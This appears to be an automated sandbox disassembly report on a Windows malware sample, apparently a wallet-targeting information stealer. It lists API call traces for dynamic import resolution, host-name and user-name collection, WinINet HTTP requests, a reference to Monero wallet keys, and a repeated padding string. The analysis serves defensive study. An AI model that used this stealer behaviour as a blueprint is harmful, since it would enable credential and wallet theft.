                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 
Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was 
founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 2f62e14e2460472d405baa3769d698b59a63486846334b521f3994730538a532
                  • Instruction ID: 37647dea899d464ab2bd535233e5538f23e398e09cdf1620e953023320423e78
                  • Opcode Fuzzy Hash: 2f62e14e2460472d405baa3769d698b59a63486846334b521f3994730538a532
                  • Instruction Fuzzy Hash: 1D4106606C2684EEEF35B7A4BC5EE9D7651DF8A70AF905060EC4052E9CCF60758D4732

                  Control-flow Graph (legend: Executed / Not Executed)
                  control_flow_graph 801 d34880-d34942 call d4a7a0 call d347b0 call d4a740 * 5 InternetOpenA StrCmpCA 816 d34944 801->816 817 d3494b-d3494f 801->817 816->817 818 d34955-d34acd call d48b60 call d4a920 call d4a8a0 call d4a800 * 2 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a920 call d4a8a0 call d4a800 * 2 InternetConnectA 817->818 819 d34ecb-d34ef3 InternetCloseHandle call d4aad0 call d39ac0 817->819 818->819 905 d34ad3-d34ad7 818->905 829 d34f32-d34fa2 call d48990 * 2 call d4a7a0 call d4a800 * 8 819->829 830 d34ef5-d34f2d call d4a820 call d4a9b0 call d4a8a0 call d4a800 819->830 830->829 906 d34ae5 905->906 907 d34ad9-d34ae3 905->907 908 d34aef-d34b22 HttpOpenRequestA 906->908 907->908 909 d34b28-d34e28 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a740 call d4a920 * 2 call d4a8a0 call d4a800 * 2 call d4aad0 lstrlen call d4aad0 * 2 lstrlen call d4aad0 HttpSendRequestA 908->909 910 d34ebe-d34ec5 InternetCloseHandle 908->910 1021 d34e32-d34e5c InternetReadFile 909->1021 910->819 1022 d34e67-d34eb9 InternetCloseHandle call d4a800 1021->1022 1023 d34e5e-d34e65 1021->1023 1022->910 1023->1022 1024 d34e69-d34ea7 call d4a9b0 call d4a8a0 call d4a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D34915
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D3493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D34ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00D50DDB,00000000,?,?,00000000,?,",00000000,?,00AFE958), ref: 00D34DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D34E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D34E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D34E49
                  • InternetCloseHandle.WININET(00000000), ref: 00D34EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00D34EC5
                  • HttpOpenRequestA.WININET(00000000,00AFEA08,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D34B15
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • InternetCloseHandle.WININET(00000000), ref: 00D34ECF
                  Strings
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                  • Instruction ID: 015246e3a188a278cd97d149910b6f34e204f363d59906de15a625a0649368e7
                  • Opcode Fuzzy Hash: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                  • Instruction Fuzzy Hash: FA12B572950118ABEB15EBA4DC92FEEB378EF54304F514199B50662091EF702F89CF72
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                  • Instruction ID: d9be1405fe409dbb5c2c492f97846bd3080d95864ed19e184bc5d73c30bd4a67
                  • Opcode Fuzzy Hash: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                  • Instruction Fuzzy Hash: 4D01A4B1A04208EFCB04DF98DD45BAEBBB8FB44B21F10425AFA45E3380D37459448BB2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                  • Instruction ID: 158ed1e6cd03b51b977592e2d57af3cc983e5301bb3728a85a524026342f87b8
                  • Opcode Fuzzy Hash: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                  • Instruction Fuzzy Hash: 01F04FB1944208AFC714DF98DD4ABAEBBB8EB44711F10025AFA05A2680C77455448BA2
                  APIs
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                  • Instruction ID: 75040abc17f4b85b396fec5a7907695b348c4a04d8747783bb06b48c9529ceab
                  • Opcode Fuzzy Hash: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                  • Instruction Fuzzy Hash: EFD05E7490030CDBCB04DFE0D8496DDBBB8FB4C312F000554DD0962340EA3054C2CAA6

                  Control-flow Graph (legend: Executed / Not Executed)
                  control_flow_graph 633 d49c10-d49c1a 634 d4a036-d4a0ca LoadLibraryA * 8 633->634 635 d49c20-d4a031 GetProcAddress * 43 633->635 636 d4a146-d4a14d 634->636 637 d4a0cc-d4a141 GetProcAddress * 5 634->637 635->634 638 d4a216-d4a21d 636->638 639 d4a153-d4a211 GetProcAddress * 8 636->639 637->636 640 d4a21f-d4a293 GetProcAddress * 5 638->640 641 d4a298-d4a29f 638->641 639->638 640->641 642 d4a2a5-d4a332 GetProcAddress * 6 641->642 643 d4a337-d4a33e 641->643 642->643 644 d4a344-d4a41a GetProcAddress * 9 643->644 645 d4a41f-d4a426 643->645 644->645 646 d4a4a2-d4a4a9 645->646 647 d4a428-d4a49d GetProcAddress * 5 645->647 648 d4a4dc-d4a4e3 646->648 649 d4a4ab-d4a4d7 GetProcAddress * 2 646->649 647->646 650 d4a515-d4a51c 648->650 651 d4a4e5-d4a510 GetProcAddress * 2 648->651 649->648 652 d4a612-d4a619 650->652 653 d4a522-d4a60d GetProcAddress * 10 650->653 651->650 654 d4a67d-d4a684 652->654 655 d4a61b-d4a678 GetProcAddress * 4 652->655 653->652 656 d4a686-d4a699 GetProcAddress 654->656 657 d4a69e-d4a6a5 654->657 655->654 656->657 658 d4a6a7-d4a703 GetProcAddress * 4 657->658 659 d4a708-d4a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00AE5B30), ref: 00D49C2D
                  • GetProcAddress.KERNEL32(74DD0000,00AE5BF0), ref: 00D49C45
                  • GetProcAddress.KERNEL32(74DD0000,00AF9688), ref: 00D49C5E
                  • GetProcAddress.KERNEL32(74DD0000,00AF96A0), ref: 00D49C76
                  • GetProcAddress.KERNEL32(74DD0000,00AF9628), ref: 00D49C8E
                  • GetProcAddress.KERNEL32(74DD0000,00AF9640), ref: 00D49CA7
                  • GetProcAddress.KERNEL32(74DD0000,00AEBA18), ref: 00D49CBF
                  • GetProcAddress.KERNEL32(74DD0000,00AFD578), ref: 00D49CD7
                  • GetProcAddress.KERNEL32(74DD0000,00AFD500), ref: 00D49CF0
                  • GetProcAddress.KERNEL32(74DD0000,00AFD590), ref: 00D49D08
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4A0), ref: 00D49D20
                  • GetProcAddress.KERNEL32(74DD0000,00AE5DB0), ref: 00D49D39
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C30), ref: 00D49D51
                  • GetProcAddress.KERNEL32(74DD0000,00AE5AD0), ref: 00D49D69
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C50), ref: 00D49D82
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4D0), ref: 00D49D9A
                  • GetProcAddress.KERNEL32(74DD0000,00AFD470), ref: 00D49DB2
                  • GetProcAddress.KERNEL32(74DD0000,00AEB9A0), ref: 00D49DCB
                  • GetProcAddress.KERNEL32(74DD0000,00AE5CD0), ref: 00D49DE3
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4B8), ref: 00D49DFB
                  • GetProcAddress.KERNEL32(74DD0000,00AFD488), ref: 00D49E14
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4E8), ref: 00D49E2C
                  • GetProcAddress.KERNEL32(74DD0000,00AFD518), ref: 00D49E44
                  • GetProcAddress.KERNEL32(74DD0000,00AE5DD0), ref: 00D49E5D
                  • GetProcAddress.KERNEL32(74DD0000,00AFD530), ref: 00D49E75
                  • GetProcAddress.KERNEL32(74DD0000,00AFD5A8), ref: 00D49E8D
                  • GetProcAddress.KERNEL32(74DD0000,00AFD548), ref: 00D49EA6
                  • GetProcAddress.KERNEL32(74DD0000,00AFD560), ref: 00D49EBE
                  • GetProcAddress.KERNEL32(74DD0000,00AFD3F8), ref: 00D49ED6
                  • GetProcAddress.KERNEL32(74DD0000,00AFD410), ref: 00D49EEF
                  • GetProcAddress.KERNEL32(74DD0000,00AFD428), ref: 00D49F07
                  • GetProcAddress.KERNEL32(74DD0000,00AFD440), ref: 00D49F1F
                  • GetProcAddress.KERNEL32(74DD0000,00AFD458), ref: 00D49F38
                  • GetProcAddress.KERNEL32(74DD0000,00AFA450), ref: 00D49F50
                  • GetProcAddress.KERNEL32(74DD0000,00AFD0E0), ref: 00D49F68
                  • GetProcAddress.KERNEL32(74DD0000,00AFCF60), ref: 00D49F81
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C70), ref: 00D49F99
                  • GetProcAddress.KERNEL32(74DD0000,00AFD038), ref: 00D49FB1
                  • GetProcAddress.KERNEL32(74DD0000,00AE57F0), ref: 00D49FCA
                  • GetProcAddress.KERNEL32(74DD0000,00AFCF48), ref: 00D49FE2
                  • GetProcAddress.KERNEL32(74DD0000,00AFD050), ref: 00D49FFA
                  • GetProcAddress.KERNEL32(74DD0000,00AE5970), ref: 00D4A013
                  • GetProcAddress.KERNEL32(74DD0000,00AE56D0), ref: 00D4A02B
                  • LoadLibraryA.KERNEL32(00AFCE40,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A03D
                  • LoadLibraryA.KERNEL32(00AFCF30,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A04E
                  • LoadLibraryA.KERNEL32(00AFCE70,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A060
                  • LoadLibraryA.KERNEL32(00AFCFA8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A072
                  • LoadLibraryA.KERNEL32(00AFCFD8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A083
                  • LoadLibraryA.KERNEL32(00AFCEE8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A095
                  • LoadLibraryA.KERNEL32(00AFCE88,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0A7
                  • LoadLibraryA.KERNEL32(00AFCE28,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0B8
                  • GetProcAddress.KERNEL32(75290000,00AE5A70), ref: 00D4A0DA
                  • GetProcAddress.KERNEL32(75290000,00AFD068), ref: 00D4A0F2
                  • GetProcAddress.KERNEL32(75290000,00AF8F88), ref: 00D4A10A
                  • GetProcAddress.KERNEL32(75290000,00AFCEA0), ref: 00D4A123
                  • GetProcAddress.KERNEL32(75290000,00AE59D0), ref: 00D4A13B
                  • GetProcAddress.KERNEL32(6FD40000,00AEB978), ref: 00D4A160
                  • GetProcAddress.KERNEL32(6FD40000,00AE57D0), ref: 00D4A179
                  • GetProcAddress.KERNEL32(6FD40000,00AEB6D0), ref: 00D4A191
                  • GetProcAddress.KERNEL32(6FD40000,00AFD080), ref: 00D4A1A9
                  • GetProcAddress.KERNEL32(6FD40000,00AFCEB8), ref: 00D4A1C2
                  • GetProcAddress.KERNEL32(6FD40000,00AE5850), ref: 00D4A1DA
                  • GetProcAddress.KERNEL32(6FD40000,00AE5810), ref: 00D4A1F2
                  • GetProcAddress.KERNEL32(6FD40000,00AFCDF8), ref: 00D4A20B
                  • GetProcAddress.KERNEL32(752C0000,00AE59B0), ref: 00D4A22C
                  • GetProcAddress.KERNEL32(752C0000,00AE5A90), ref: 00D4A244
                  • GetProcAddress.KERNEL32(752C0000,00AFCE58), ref: 00D4A25D
                  • GetProcAddress.KERNEL32(752C0000,00AFD008), ref: 00D4A275
                  • GetProcAddress.KERNEL32(752C0000,00AE56B0), ref: 00D4A28D
                  • GetProcAddress.KERNEL32(74EC0000,00AEB6F8), ref: 00D4A2B3
                  • GetProcAddress.KERNEL32(74EC0000,00AEB720), ref: 00D4A2CB
                  • GetProcAddress.KERNEL32(74EC0000,00AFD098), ref: 00D4A2E3
                  • GetProcAddress.KERNEL32(74EC0000,00AE5950), ref: 00D4A2FC
                  • GetProcAddress.KERNEL32(74EC0000,00AE57B0), ref: 00D4A314
                  • GetProcAddress.KERNEL32(74EC0000,00AEBAB8), ref: 00D4A32C
                  • GetProcAddress.KERNEL32(75BD0000,00AFCF78), ref: 00D4A352
                  • GetProcAddress.KERNEL32(75BD0000,00AE5770), ref: 00D4A36A
                  • GetProcAddress.KERNEL32(75BD0000,00AF9018), ref: 00D4A382
                  • GetProcAddress.KERNEL32(75BD0000,00AFCF90), ref: 00D4A39B
                  • GetProcAddress.KERNEL32(75BD0000,00AFCED0), ref: 00D4A3B3
                  • GetProcAddress.KERNEL32(75BD0000,00AE5890), ref: 00D4A3CB
                  • GetProcAddress.KERNEL32(75BD0000,00AE56F0), ref: 00D4A3E4
                  • GetProcAddress.KERNEL32(75BD0000,00AFCFC0), ref: 00D4A3FC
                  • GetProcAddress.KERNEL32(75BD0000,00AFD0B0), ref: 00D4A414
                  • GetProcAddress.KERNEL32(75A70000,00AE5830), ref: 00D4A436
                  • GetProcAddress.KERNEL32(75A70000,00AFCFF0), ref: 00D4A44E
                  • GetProcAddress.KERNEL32(75A70000,00AFD0C8), ref: 00D4A466
                  • GetProcAddress.KERNEL32(75A70000,00AFD020), ref: 00D4A47F
                  • GetProcAddress.KERNEL32(75A70000,00AFCF00), ref: 00D4A497
                  • GetProcAddress.KERNEL32(75450000,00AE5870), ref: 00D4A4B8
                  • GetProcAddress.KERNEL32(75450000,00AE5710), ref: 00D4A4D1
                  • GetProcAddress.KERNEL32(75DA0000,00AE5730), ref: 00D4A4F2
                  • GetProcAddress.KERNEL32(75DA0000,00AFCE10), ref: 00D4A50A
                  • GetProcAddress.KERNEL32(6F070000,00AE5930), ref: 00D4A530
                  • GetProcAddress.KERNEL32(6F070000,00AE5990), ref: 00D4A548
                  • GetProcAddress.KERNEL32(6F070000,00AE58B0), ref: 00D4A560
                  • GetProcAddress.KERNEL32(6F070000,00AFCF18), ref: 00D4A579
                  • GetProcAddress.KERNEL32(6F070000,00AE5750), ref: 00D4A591
                  • GetProcAddress.KERNEL32(6F070000,00AE58D0), ref: 00D4A5A9
                  • GetProcAddress.KERNEL32(6F070000,00AE5790), ref: 00D4A5C2
                  • GetProcAddress.KERNEL32(6F070000,00AE59F0), ref: 00D4A5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D4A5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D4A607
                  • GetProcAddress.KERNEL32(75AF0000,00AFD158), ref: 00D4A629
                  • GetProcAddress.KERNEL32(75AF0000,00AF8FB8), ref: 00D4A641
                  • GetProcAddress.KERNEL32(75AF0000,00AFD290), ref: 00D4A659
                  • GetProcAddress.KERNEL32(75AF0000,00AFD2C0), ref: 00D4A672
                  • GetProcAddress.KERNEL32(75D90000,00AE58F0), ref: 00D4A693
                  • GetProcAddress.KERNEL32(6E360000,00AFD2D8), ref: 00D4A6B4
                  • GetProcAddress.KERNEL32(6E360000,00AE5910), ref: 00D4A6CD
                  • GetProcAddress.KERNEL32(6E360000,00AFD2A8), ref: 00D4A6E5
                  • GetProcAddress.KERNEL32(6E360000,00AFD2F0), ref: 00D4A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                  • Instruction ID: 03d1c4cbc61866fd1660ee10c33f4ebe8bab3b610cd9e7bcac72d46d29f393c5
                  • Opcode Fuzzy Hash: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                  • Instruction Fuzzy Hash: 52621AB5504208AFD348DFA8ED8995E37F9F7CC201716851AA61DC3264D63A98C2FF63

                  Control-flow Graph

                  • Graph image not preserved in extraction: function d36280-d3652d; nodes labelled InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle (executed / not executed colouring lost)
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                  • HttpOpenRequestA.WININET(00000000,GET,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D36385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D363FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D3646D
                  • InternetCloseHandle.WININET(00000000), ref: 00D364EF
                  • InternetCloseHandle.WININET(00000000), ref: 00D364F9
                  • InternetCloseHandle.WININET(00000000), ref: 00D36503
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                  • Instruction ID: 2577da46c9b6528a0d03d9ddbe5fa3db44c0c9ebfe01b7f52115247d2d186c0d
                  • Opcode Fuzzy Hash: 8f70f7f9604c9066d9410de66ceeb9a3591f963a343a8105d56a04ce6885404a
                  • Instruction Fuzzy Hash: F8715F71A40218ABEB24DFA4CC49BEE7778FF44701F108198F5096B190DBB4AA85CF62

                  Control-flow Graph

                  • Graph image not preserved in extraction: function d45510-d45ac6; nodes labelled StrCmpCA, Sleep (executed / not executed colouring lost)
                  APIs
                    • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                    • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D456A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45857
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45318
                    • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D4532F
                    • Part of subcall function 00D452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00D45364
                    • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D45383
                    • Part of subcall function 00D452C0: lstrlen.KERNEL32(00000000), ref: 00D453AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D4578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00D45A1B
                  Strings
                  Yara matches
